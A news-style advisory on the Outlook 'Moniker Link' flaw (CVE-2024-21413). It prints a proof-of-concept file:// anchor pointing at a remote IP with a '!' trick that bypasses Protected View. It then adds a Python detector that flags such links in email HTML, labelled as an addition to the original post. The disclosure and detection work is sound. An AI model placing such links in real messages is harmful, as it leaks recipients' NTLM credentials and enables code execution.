The link is a monster in your Outlook: just one character opens any doors for hackers

How to protect yourself from an invisible threat and avoid becoming a victim of cybercriminals?

Microsoft is warning users about a critical vulnerability in its office suite that allows unauthorized attackers to execute malicious code.

The vulnerability, discovered by Check Point, was designated CVE-2024-21413. It is triggered when emails with malicious links are opened in vulnerable versions of Outlook.

Especially dangerous is the fact that the bug allows hackers to bypass the "Protected View" function, which is designed to block malicious content in Office files. Instead of opening dangerous files in read-only mode, they are launched immediately in edit mode.

According to the company, attacks using CVE-2024-21413 can be carried out remotely, without user interaction, and the complexity of such attacks for hackers remains low.

"Successful exploitation of this vulnerability can grant the attacker high privileges, including the ability to read, write, and delete files," Microsoft said in a statement.

The vulnerability affects several Office products, including Microsoft Office LTSC 2021, Microsoft 365 for Enterprises, as well as Microsoft Outlook 2016 and Microsoft Office 2019 (which are in extended support).

Check Point explains in its report that the vulnerability, which it named "Moniker Link", allows the built-in Outlook protections against malicious links embedded in emails to be bypassed by using the file:// protocol to reach the attacker's remote server.

Adding an exclamation mark immediately after the document's file extension bypasses Outlook's security restrictions. In this case, when the link is clicked, the application accesses the remote resource and opens the target file without displaying warnings or errors.

<a href="file:///\\10.10.111.111\test\test.rtf!something">LINK</a>

The vulnerability appeared due to the use of the unsafe MkParseDisplayName API, which may also affect other software that uses it.

As a result of successful exploitation of the CVE-2024-21413 vulnerability, it is possible to steal NTLM credential information and execute arbitrary code using maliciously created Office documents.

Check Point recommends that all Outlook users apply the official security update as soon as possible, which, fortunately, is already available.
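
One way to flag this link shape in an HTML message body at a mail gateway or during triage, as an added example that is not part of the original post or of Check Point's report. The regex, the function name `find_moniker_links` and every sample link other than the one quoted above are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample body; only the first link is the one quoted in the post.
SAMPLE_HTML = r'''
<p><a href="file:///\\10.10.111.111\test\test.rtf!something">LINK</a></p>
<p><a href="FILE://fileserver.example/share/doc.docx%21x">encoded "!"</a></p>
<p><a href="https://example.com/page.html">ordinary web link</a></p>
<p><a href="file://fileserver.example/share/doc.docx">share link, no "!"</a></p>
'''

# file: URL -> host -> path ending in ".ext" -> "!" -> trailing item text
MONIKER_RE = re.compile(
    r"^file:[/\\]*(?P<host>[^/\\!]+)[/\\](?P<path>[^!]*\.[a-z0-9]{1,8})!(?P<item>.*)$",
    re.IGNORECASE,
)

class _HrefCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs += [v for k, v in attrs if k == "href" and v]

def find_moniker_links(html_body):
    """Return one finding per <a href> that has the Moniker Link shape."""
    collector = _HrefCollector()
    collector.feed(html_body)
    findings = []
    for href in collector.hrefs:
        # Decode %21 and similar so an encoded "!" is not missed.
        m = MONIKER_RE.match(unquote(href.strip()))
        if m:
            # A bare drive letter ("C:") is a local path, not a remote server.
            remote = re.fullmatch(r"[a-z]:", m["host"], re.IGNORECASE) is None
            findings.append({"href": href, **m.groupdict(), "remote": remote})
    return findings

if __name__ == "__main__":
    for finding in find_moniker_links(SAMPLE_HTML):
        print(finding)
```

A match only says the message carries a link of this shape; it says nothing about whether the receiving Outlook client has the security update installed.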
 